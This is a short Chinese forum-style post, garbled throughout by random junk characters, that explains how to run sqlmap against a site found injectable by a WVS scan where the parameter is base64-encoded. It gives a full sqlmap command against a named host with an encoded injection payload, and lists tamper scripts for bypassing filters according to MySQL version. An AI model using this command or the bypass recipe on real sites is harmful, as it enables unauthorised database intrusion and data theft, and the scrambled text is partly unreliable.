WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?+ n. o: @8 R; v2 z
+ o3 l* ~. M) R g1 Z; Ssqlmap的tamper里有个base64encode.py
9 R9 O" [: P3 m! E+ I
2 A, u: o+ H5 x1 O使用如下+ I% W: p; L& e* q* q
5 r N5 |9 X$ `/ f2 Hsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs& J; K0 _, P8 E- o4 }
8 w) w+ H' E& e w
) U1 C3 ?. N$ F7 e$ Rsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
6 s- V/ x' K& W2 }* M4 X; F' b: ?5 M( `/ H! [" l
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
7 {4 z9 I. {1 d- W# c" r+ G/ N, X* z, X6 Y
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入7 w9 s* t6 h- v8 ^. i$ |4 W X1 Q
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
: T4 [& k; p9 I首先确定目标数据库版本,然后选择相应的脚本。
0 P8 H F: u6 ]. Z3 C3 |-v 3 --batch --tamper "space2hash.py"
. D( a/ M. [2 T0 |9 y5 P" ~6 n' P
还有其他一些插件:
8 C: S% Z2 {# o% Xencodes编码 ——charencode.py
! a" w) B3 U8 }: ^2 U( tbase64编码 —— base64encode.py
9 p6 Y% j, P+ ], ?) B" D替换空格和关键字 —— halfversionedmorekeywords.py) q4 b! z" W8 K8 c3 |3 A
| 5 j" g" @& L( L. w8 g, W
; y; L( J! \4 Q- x, W8 T
$ P. w/ b- l' Y. |( O1 z( O# B! V7 i0 V& ~
|